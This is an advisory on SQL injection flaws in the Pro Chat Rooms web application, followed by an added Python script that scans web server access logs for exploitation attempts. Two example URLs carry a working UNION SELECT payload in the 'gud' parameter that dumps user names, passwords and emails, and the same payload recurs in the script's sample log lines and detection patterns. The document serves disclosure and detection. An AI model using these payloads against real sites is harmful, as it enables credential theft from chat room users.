Pro Chat Rooms Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs demonstrate the issues; in both, the injected SQL is passed in the gud parameter:

http://www.example.com/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*

http://www.example.com/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*
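
For defenders, requests like the two above can be found in web server access logs. The following is an added example, not part of the original advisory or of Pro Chat Rooms: it flags requests to the two affected scripts whose gud value is not a plain number. The log lines are constructed samples, and the assumption that a legitimate gud is a decimal id is mine, not the advisory's.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names and parameter come from the advisory's example URIs.
TARGET_SCRIPTS = ("/profiles/index.php", "/profiles/admin.php")
PARAM = "gud"
# Assumption: a legitimate gud value is a plain decimal id.
VALID_GUD = re.compile(r"\d{1,10}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INDICATORS = {
    "quote": re.compile(r"['\"]"),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "comment": re.compile(r"/\*|--|#"),
    "users-table": re.compile(r"prochatrooms_users", re.I),
}

def check_line(log_line):
    """Return (path, decoded_value, reasons) for a suspicious gud value, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(TARGET_SCRIPTS):
        return None
    # parse_qs percent-decodes and maps '+' to space, so encoded payloads match too.
    for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
        if VALID_GUD.fullmatch(value):
            continue
        reasons = [name for name, rx in INDICATORS.items() if rx.search(value)]
        return url.path, value, reasons or ["non-numeric"]
    return None

def scan(lines):
    """Return the hits for every suspicious line in an iterable of log lines."""
    return [hit for hit in map(check_line, lines) if hit]

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /chat/profiles/index.php?gud=42 HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2010:10:00:05 +0000] "GET /chat/profiles/index.php?gud=-1\'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/* HTTP/1.1" 200 900',
    '192.0.2.66 - - [01/Jan/2010:10:00:09 +0000] "GET /chat/profiles/admin.php?gud=7%27 HTTP/1.1" 200 300',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /chat/index.php?gud=-1\' HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for path, value, reasons in scan(SAMPLE_LOG):
        print(path, reasons, repr(value))
```

A hit on the users-table indicator together with a 200 response is worth treating as possible credential disclosure rather than a failed probe.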


 

Copyright 2010, SecurityFocus